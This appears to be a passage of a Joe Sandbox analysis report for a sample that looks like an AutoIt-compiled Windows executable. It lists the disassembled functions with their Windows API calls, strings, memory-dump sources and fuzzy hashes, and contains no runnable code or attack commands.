                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00435878
                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004358ED
                            • WSACleanup.WSOCK32 ref: 004358F3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                            • String ID: Ping
                            • API String ID: 1028309954-2246546115
                            • Opcode ID: 5f8179a1c5e796d8beedc3e41b1c9590612aba5d81eb0bb248936415b5dd4ab8
                            • Instruction ID: 6130df0eff11f3b1a8940926e9ad2f5e21e972ab08d87e92d3860ff7f3dc3f03
                            • Opcode Fuzzy Hash: 5f8179a1c5e796d8beedc3e41b1c9590612aba5d81eb0bb248936415b5dd4ab8
                            • Instruction Fuzzy Hash: AF51AC31600700EFDB15AF25DC49B2AB7E4EF48720F04492AF996DB2A1DB34EC45CB4A
                            Function 0042B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0042B4D0
                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0042B546
                            • GetLastError.KERNEL32 ref: 0042B550
                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0042B5BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Error$Mode$DiskFreeLastSpace
                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                            • API String ID: 4194297153-14809454
                            • Opcode ID: c9520700b220f21d3ff2e4f692acfe47bc8e6a2d588e1653901161f066a6c7a6
                            • Instruction ID: b1e85f025f45419c1d8d1f49157ce627d0042d22bad58625b96e5a028055eb74
                            • Opcode Fuzzy Hash: c9520700b220f21d3ff2e4f692acfe47bc8e6a2d588e1653901161f066a6c7a6
                            • Instruction Fuzzy Hash: 5C318135A00215AFCB00DB68D845FAA77B4EB45304F54816BF905DB291DB749A86CB85
                            Function 00418F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00419014
                            • GetDlgCtrlID.USER32 ref: 0041901F
                            • GetParent.USER32 ref: 0041903B
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0041903E
                            • GetDlgCtrlID.USER32 ref: 00419047
                            • GetParent.USER32(?), ref: 00419063
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00419066
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1536045017-1403004172
                            • Opcode ID: b7a69161000777e2c79ec3331ee89c281f1cb33bd05e73e21b76612a4ba126d3
                            • Instruction ID: 6b8961dd2bc39398d4085525ff69cb574551c56603de6913301a0d910562e042
                            • Opcode Fuzzy Hash: b7a69161000777e2c79ec3331ee89c281f1cb33bd05e73e21b76612a4ba126d3
                            • Instruction Fuzzy Hash: 1C212574A00108BBDF05EBA0CC95FFEBB74EF49310F10012AF961972A1DB79585ADB24
                            Function 0041907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004190FD
                            • GetDlgCtrlID.USER32 ref: 00419108
                            • GetParent.USER32 ref: 00419124
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00419127
                            • GetDlgCtrlID.USER32 ref: 00419130
                            • GetParent.USER32(?), ref: 0041914C
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0041914F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1536045017-1403004172
                            • Opcode ID: 8f5c1e9f43654e7f3b188c157bdc9b260699bd59bb96f9f16548602d346fe7fa
                            • Instruction ID: 9ab16b382d7fd9508192e5cf3d2851a91d14d30c64641ccb079bcc8813c9f1cf
                            • Opcode Fuzzy Hash: 8f5c1e9f43654e7f3b188c157bdc9b260699bd59bb96f9f16548602d346fe7fa
                            • Instruction Fuzzy Hash: 7A210A74A01105BBDF01ABA0CC89FFEBB74EF49300F51402AF911D72A1DB795899DB25
                            Function 00419163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32 ref: 0041916F
                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00419184
                            • _wcscmp.LIBCMT ref: 00419196
                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00419211
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClassMessageNameParentSend_wcscmp
                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                            • API String ID: 1704125052-3381328864
                            • Opcode ID: b8b78439400c751c152cef179d6bbe1a0258b38488071c59b1bbbe31e7c8407b
                            • Instruction ID: 76ab9af7ef6e23017072bc2a41f96f645f14eeffd4bdcbe3f26ce09827bd92f5
                            • Opcode Fuzzy Hash: b8b78439400c751c152cef179d6bbe1a0258b38488071c59b1bbbe31e7c8407b
                            • Instruction Fuzzy Hash: 7A1159BA288317BAFA112624DC1BEE7379C9B01360B300577FA04B50E1FF796C92599C
                            Function 00427990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00427A6C
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ArraySafeVartype
                            • String ID:
                            • API String ID: 1725837607-0
                            • Opcode ID: 0cab5c12be43894539f66c963f7b85617d6e0f7852e46c6bb80fe9f5ea15692d
                            • Instruction ID: 4bcc18010657207a62f174ce0f6402b408ad315b76e59d5a1a0160e163ad07fd
                            • Opcode Fuzzy Hash: 0cab5c12be43894539f66c963f7b85617d6e0f7852e46c6bb80fe9f5ea15692d
                            • Instruction Fuzzy Hash: C2B1B171A0422A9FDB01DFA5E885BBFB7B4FF09324F54402AE501EB341D738A941CB99
                            Function 004211CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32(?,?,?,?,?,00420268,?,00000001), ref: 004211F0
                            • GetForegroundWindow.USER32 ref: 00421204
                            • GetWindowThreadProcessId.USER32(00000000), ref: 0042120B
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0042121A
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0042122C
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00421245
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00421257
                            • AttachThreadInput.USER32(00000000,00000000), ref: 0042129C
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004212B1
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004212BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                            • String ID:
                            • API String ID: 2156557900-0
                            • Opcode ID: 7651b53942e2b498f1357cf3ad6cb42d9b6ceb73704d432da091341dc74cc313
                            • Instruction ID: b444fd9eb89e9c708be6edea87e7b80ab5b37c4f1afe9c7f56ca57c30cd6dcee
                            • Opcode Fuzzy Hash: 7651b53942e2b498f1357cf3ad6cb42d9b6ceb73704d432da091341dc74cc313
                            • Instruction Fuzzy Hash: C6319F75600214FBEB10AF54FC48F6A77A9AB65311F52417AFB00E62A0D7789E40CB69
                            Function 003CFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                            Download Yara Rule
                            APIs
                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003CFAA6
                            • OleUninitialize.OLE32(?,00000000), ref: 003CFB45
                            • UnregisterHotKey.USER32(?), ref: 003CFC9C
                            • DestroyWindow.USER32 ref: 004045D6
                            • FreeLibrary.KERNEL32(?), ref: 0040463B
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00404668
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                            • String ID: close all
                            • API String ID: 469580280-3243417748
                            • Opcode ID: ef71cd65650e90d6eb973c56d0e243c72f3b93117370cea4b14ae50aec3c1e20
                            • Instruction ID: 55fcca5ebcdac835cc6285002417c8265fae10f181dd76137b803083912b3ea9
                            • Opcode Fuzzy Hash: ef71cd65650e90d6eb973c56d0e243c72f3b93117370cea4b14ae50aec3c1e20
                            • Instruction Fuzzy Hash: C3A19A71301212CFCB1AEF10C994F69F365AF45700F1146BEE90AAB2A1DB35AD56CF54
                            Function 00439113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Variant$ClearInit$_memset
                            • String ID: ,,E$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                            • API String ID: 2862541840-3165839431
                            • Opcode ID: eb4f85e272e90f9015da34f85b47eefbf4942734751feed276f513b524450967
                            • Instruction ID: c64f4b964a96e8d41c5320c392203f13f918a1259e2e806feeb94417a8cf6460
                            • Opcode Fuzzy Hash: eb4f85e272e90f9015da34f85b47eefbf4942734751feed276f513b524450967
                            • Instruction Fuzzy Hash: 3A91AE71A00219ABDF24DFA1C848FAFB7B8EF49710F10855AF915AB280D7B49D45CBA4
                            Function 0041A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ChildEnumWindows
                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                            • API String ID: 3555792229-1603158881
                            • Opcode ID: 818496be7bf06c559657e9b6f8025d2eadec71ed745bfb021d01f9690b523c93
                            • Instruction ID: dbcf69cd32cc03cbccd9b7bc3e27d7acfdfe441046bb4482a1ea152b365a9aeb
                            • Opcode Fuzzy Hash: 818496be7bf06c559657e9b6f8025d2eadec71ed745bfb021d01f9690b523c93
                            • Instruction Fuzzy Hash: 1B91D771A01609AADB09DFA0C441BEEFB74FF04300F54812BD859A7381DF3569EACB99
                            Function 0044B351 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON
                            Download Yara Rule
                            APIs
                            • IsWindow.USER32(00E32460), ref: 0044B3EB
                            • IsWindowEnabled.USER32(00E32460), ref: 0044B3F7
                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0044B4DB
                            • SendMessageW.USER32(00E32460,000000B0,?,?), ref: 0044B512
                            • IsDlgButtonChecked.USER32(?,?,?,?), ref: 0044B54F
                            • GetWindowLongW.USER32(00E32460,000000EC), ref: 0044B571
                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0044B589
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                            • String ID: `$
                            • API String ID: 4072528602-74666722
                            • Opcode ID: de05b3971909b5743a0d57eb54130c05cffa4b96cb89ed5309e9b40065e5f353
                            • Instruction ID: 7aab1e85c54b7b0d0d36799a54c3a5bd6906fe942b4cbd3f86f82867757dc24d
                            • Opcode Fuzzy Hash: de05b3971909b5743a0d57eb54130c05cffa4b96cb89ed5309e9b40065e5f353
                            • Instruction Fuzzy Hash: 5771BF34604604EFFB219F55C890FBBBBB9EF09300F14846AE945973A2C739E851CB99
                            Function 003C2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                            Download Yara Rule
                            APIs
                            • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 003C2EAE
                              • Part of subcall function 003C1DB3: GetClientRect.USER32(?,?), ref: 003C1DDC
                              • Part of subcall function 003C1DB3: GetWindowRect.USER32(?,?), ref: 003C1E1D
                              • Part of subcall function 003C1DB3: ScreenToClient.USER32(?,?), ref: 003C1E45
                            • GetDC.USER32 ref: 003FCD32
                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003FCD45
                            • SelectObject.GDI32(00000000,00000000), ref: 003FCD53
                            • SelectObject.GDI32(00000000,00000000), ref: 003FCD68
                            • ReleaseDC.USER32(?,00000000), ref: 003FCD70
                            • MoveWindow.USER32(?,?,?,?,?,?), ref: 003FCDFB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                            • String ID: U
                            • API String ID: 4009187628-3372436214
                            • Opcode ID: 57b57383aae00cef1b6033bd192547bc58903b8bfb3fa3063d945e895b4dc255
                            • Instruction ID: 0d4486beb74324ac2faa1340812044cb046775a44551ac708856fc8af6dce99a
                            • Opcode Fuzzy Hash: 57b57383aae00cef1b6033bd192547bc58903b8bfb3fa3063d945e895b4dc255
                            • Instruction Fuzzy Hash: C071B93550020DDFCF229F64C980ABA7BB5FF49320F15527AFE55AA2A6C7308C81DB60
                            Function 00431A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00431A50
                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431A7C
                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00431ABE
                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00431AD3
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00431AE0
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00431B10
                            • InternetCloseHandle.WININET(00000000), ref: 00431B57
                              • Part of subcall function 00432483: GetLastError.KERNEL32(?,?,00431817,00000000,00000000,00000001), ref: 00432498
                              • Part of subcall function 00432483: SetEvent.KERNEL32(?,?,00431817,00000000,00000000,00000001), ref: 004324AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                            • String ID:
                            • API String ID: 2603140658-3916222277
                            • Opcode ID: be5cfb7412a65d1419c72669ccadd2704bb339a1e4d4daf2bf4df7509fd0a8d8
                            • Instruction ID: 5911d334e9c56b9bfab2b87fba179ad5284ac6077b328a3dc3467e01bf87d41a
                            • Opcode Fuzzy Hash: be5cfb7412a65d1419c72669ccadd2704bb339a1e4d4daf2bf4df7509fd0a8d8
                            • Instruction Fuzzy Hash: 2E4193B1501218BFEB119F50CC85FBB7BACEF09354F00512BFA059A251E7789E448BA8
                            Function 004462CD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004462EC
                            • GetWindowLongW.USER32(00E32460,000000F0), ref: 0044631F
                            • GetWindowLongW.USER32(00E32460,000000F0), ref: 00446354
                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00446386
                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004463B0
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 004463C1
                            • SetWindowLongW.USER32(00000000,000000F0,00000000,?,?,?,00449E3C,?,?,?,?), ref: 004463DB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: LongWindow$MessageSend
                            • String ID: `$
                            • API String ID: 2178440468-74666722
                            • Opcode ID: 3c047be76a6dc08f249869ae5af68b4ea76b0a9d9c02d59fb9b3315eb57d6287
                            • Instruction ID: 59adba7c445f08eaaf693f40fc2ac462c3324f677ceb608258c45152b059c18e
                            • Opcode Fuzzy Hash: 3c047be76a6dc08f249869ae5af68b4ea76b0a9d9c02d59fb9b3315eb57d6287
                            • Instruction Fuzzy Hash: BD311634640190AFEB20DF19EC84F5937E1FB4A714F1A01BAF9018F2B2CB75AC559B5A
                            Function 00438C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0044F910), ref: 00438D28
                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0044F910), ref: 00438D5C
                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00438ED6
                            • SysFreeString.OLEAUT32(?), ref: 00438F00
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                            • String ID:
                            • API String ID: 560350794-0
                            • Opcode ID: 318e2e6280b5840058b78a4c77eacc298493cc8af287e65865e3d681fba5ca32
                            • Instruction ID: f385cc27ff70f93f2593e02441e34a828f102f80c64645e093c9ff2c2124fce0
                            • Opcode Fuzzy Hash: 318e2e6280b5840058b78a4c77eacc298493cc8af287e65865e3d681fba5ca32
                            • Instruction Fuzzy Hash: 3AF15871A00209EFCF04DF94C888EAEB7B9FF49314F10849AF905AB251DB75AE46CB54
                            Function 0043F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 0043F6B5
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043F848
                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043F86C
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043F8AC
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043F8CE
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0043FA4A
                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0043FA7C
                            • CloseHandle.KERNEL32(?), ref: 0043FAAB
                            • CloseHandle.KERNEL32(?), ref: 0043FB22
                            Memory Dump Source
